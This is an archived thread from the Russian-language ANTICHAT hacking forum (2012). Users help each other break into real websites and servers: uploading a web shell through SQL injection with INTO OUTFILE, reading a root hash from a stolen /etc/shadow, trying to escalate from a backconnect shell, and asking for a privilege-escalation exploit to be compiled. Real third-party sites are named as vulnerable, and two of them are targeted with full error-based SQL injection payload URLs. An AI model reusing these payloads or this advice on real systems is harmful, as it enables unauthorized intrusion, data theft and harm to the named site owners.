ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

17.04.2012, 22:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 13805
Репутация:
0
|
|
Сообщение от Mr.Snuffer
Mr.Snuffer said:
Если это магические ковычки, то +'/var/www/html/azaz.html'- тоже хексить надо.
и так пробовал не получается
|
|
|
|

17.04.2012, 23:17
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме: 346497
Репутация:
303
|
|
во первых: кодирование ковычек нельзя использовать в INTO OUTFILE. Ибо мускул требует строку, а следовательно должны быть кавычки. Не путайте то, что выдает мускул в выводе - там где можно делать тот же хекс и то что на инпуте попадает в сам мускул.
Далее: Права на директории только самым непосредственным методом можно узнать - пробовать в них заливать. Конечно есть ряд стандартных директорые имеют больший шанс иметь права на запись как -то : /temp,/upload etc. Но! Смотрите сразу под каким юзером живет веб-сервер и используется ли UID-GID(suexec, ITK etc). Могут иметь место ситуации , когда сам PHP может иметь полный доступ к директориям и папкам, а USER MYSQL через которого ты делаешь OUTFULE - нет.
Ищи интерфейсы для работу с mysql , а-ля PHPMYADMIN. Проверяй удаленный коннект, пробуй через reverse-IP.
|
|
|

17.04.2012, 23:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 17281
Репутация:
-4
|
|
Вот такое я нашел в файле shadow. Кто мне объяснит что это, и что с этим можно сделать.
Сообщение от None
root:$1$IQFgYfgK$Eip37UYMldc5jJiRGLQky0:14134:0:99 999:7:::
bin:*:12851:0:99999:7:::
Я так понял там пароли, и еще что-то. Вот там вторая строчка, на месте хеша звездочка, это значит любой пароль? Пользователей много, как мне определить кто из них рут, и как мне впоследствии войти под ним?
|
|
|
|

17.04.2012, 23:23
|
|
Guest
Сообщений: n/a
Провел на форуме: 142623
Репутация:
19
|
|
Сообщение от kise
kise said:
Вот такое я нашел в файле shadow. Кто мне объяснит что это, и что с этим можно сделать.
Я так понял там пароли, и еще что-то. Вот там вторая строчка, на месте хеша звездочка, это значит любой пароль? Пользователей много, как мне определить кто из них рут, и как мне впоследствии войти под ним?
root как правило имеет uid 0
Сообщение от None
и как мне впоследствии войти под ним?
user имя пользователя
|
|
|
|

17.04.2012, 23:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 17281
Репутация:
-4
|
|
А, вспомнил!
su username
Выполняю, но мне пишет вот это:
Сообщение от None
sh-3.1$ su adm
standard in must be a tty
--------------
Я не могу зайти под другим пользователем... Что делать?
Откомпилируйте кто-нибудь вот этот сплоит - http://www.1337day.com/exploits/17158
|
|
|
|

17.04.2012, 23:40
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме: 346497
Репутация:
303
|
|
Сообщение от kise
kise said:
А, вспомнил!
su username
Выполняю, но мне пишет вот это:
--------------
Я не могу зайти под другим пользователем... Что делать?
Откомпилируйте кто-нибудь вот этот сплоит - http://www.1337day.com/exploits/17158
Судя по всему через backconnect ?
Это означает, что текущая сессия не привязана к псевдотерминалу. Пробуй ssh youruser@localhost. Но не файт что получится, так как есть ряд граничных условий.
|
|
|

17.04.2012, 23:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 17281
Репутация:
-4
|
|
нет, к сожалению
Сообщение от None
sh-3.1$ ssh adm@localhost
Pseudo-terminal will not be allocated because stdin is not a terminal.
Could not create directory '/var/www/.ssh'.
Host key verification failed.
|
|
|
|

17.04.2012, 23:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 13805
Репутация:
0
|
|
Блин ничего не получатся вообще
|
|
|
|

18.04.2012, 02:24
|
|
Новичок
Регистрация: 03.12.2008
Сообщений: 5
Провел на форуме: 597696
Репутация:
1
|
|
http://www.girlsweb.org/registerNew.php
поле email и username вроде как уязвимы...получилось раскрутить только как blind-sql inj...возможно ли с 1-2 запросов залить шелл?
magic_quotes_gpc = On
|
|
|

18.04.2012, 04:36
|
|
Guest
Сообщений: n/a
Провел на форуме: 10268
Репутация:
0
|
|
http://allinstyle.ru/?index.php'or(select*from(select(name_const(versio n(),1)),name_const(version(),1))a)and(1)='1
http://discoverytravel.ru/next.php?pid=2'or(select*from(select(name_const(ve rsion(),1)),name_const(version(),1))a)and(1)='1
Видно в ОПЕРЕ.
Вот подобного рода инъекции с запретами на пробелы, кроме версии базы, можно что-нибудь выводить? Tiger ответил, спасибо ему, но а как дальше? мануалы предательски молчат. пичалька.
Они вообще юзабельны? Или ограничиваться номером версии это уже найс?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|